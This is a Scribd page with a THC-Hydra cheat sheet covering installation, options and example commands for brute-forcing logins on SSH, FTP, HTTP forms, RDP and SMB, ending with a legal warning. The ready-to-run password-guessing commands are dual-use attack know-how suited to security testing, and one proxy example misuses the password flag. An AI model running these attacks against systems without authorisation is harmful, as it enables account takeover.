Scribd
Upload
672 views4 pages

Hydra Cheat Sheet

The THC-Hydra Cheat Sheet provides installation instructions for Linux, macOS, and Windows, along with basic syntax and options for using the Hydra login cracker. It lists common protocols supported by Hydra and provides examples for brute force attacks on SSH, FTP, HTTP, RDP, and SMB. Additionally, it includes advanced options for proxy support, custom headers, and legal warnings regarding ethical usage.

Uploaded by

parajulidavid51
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
672 views4 pages

Hydra Cheat Sheet

The THC-Hydra Cheat Sheet provides installation instructions for Linux, macOS, and Windows, along with basic syntax and options for using the Hydra login cracker. It lists common protocols supported by Hydra and provides examples for brute force attacks on SSH, FTP, HTTP, RDP, and SMB. Additionally, it includes advanced options for proxy support, custom headers, and legal warnings regarding ethical usage.

Uploaded by

parajulidavid51
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 4

THC-HYDRA CHEAT SHEET (2025 Edition)

THC-HYDRA CHEAT SHEET (2025 Edition)

Hydra is a fast and flexible login cracker supporting numerous protocols.

INSTALLATION

Linux (Debian/Ubuntu):

sudo apt update

sudo apt install hydra

macOS (with Homebrew):

brew install hydra

Windows:

- Get from: [Link]

- Use WSL (Windows Subsystem for Linux) for full support.

BASIC SYNTAX

hydra [OPTIONS] -l USER or -L FILE -p PASS or -P FILE [PROTOCOL]://[TARGET]

Basic Options:

-l Single username

-L File of usernames

-p Single password

-P File of passwords
-s Port (if non-default)

-t Number of parallel tasks (default: 16)

-v Verbose mode

-V Shows each login attempt

-f Exit after first valid password

-o Output file

-F Exit after one valid login per host

-e nsr Try null password, same as user, reversed login

-u Loop mode

COMMON PROTOCOLS

ftp, ssh, telnet, http-get, http-post-form, rdp, smtp, pop3, imap, vnc, smb, rexec, rlogin,
pcanywhere

EXAMPLES

SSH Brute Force:

hydra -l root -P [Link] ssh://[Link]

FTP Brute Force:

hydra -L [Link] -P [Link] [Link]

HTTP Form POST Attack:

hydra -l admin -P [Link]


http-post-form://[Link]/[Link]:user=^USER^&pass=^PASS^:F=Login failed

RDP Attack:

hydra -L [Link] -P [Link] rdp://[Link]


SMB Attack:

hydra -L [Link] -P [Link] smb://[Link]

ADVANCED OPTIONS

Add Proxy Support:

hydra -l admin -P [Link] -s 8080 -p proxy_host:proxy_port http-get://target

Bruteforce Passwords Only:

hydra -l admin -P [Link] -t 4 -vV [Link]

Bruteforce Usernames Only:

hydra -L [Link] -p secret123 ssh://[Link]

Add Custom Headers:

hydra -l admin -P [Link]


http-post-form://[Link]/[Link]:"user=^USER^&pass=^PASS^:F=Invalid
login":H="User-Agent: CustomAgent"

OUTPUT & LOGGING

-o [Link] Save successful attempts

-b json Output in JSON format

TIPS

- Use -V for verbose login attempts.

- Use -f to stop after the first valid password.

- Use --help for the full module list.


- Combine with tools like Crunch to generate wordlists.

LEGAL WARNING

Use Hydra only on systems you own or have permission to test. Unauthorized use is illegal
and unethical.

You might also like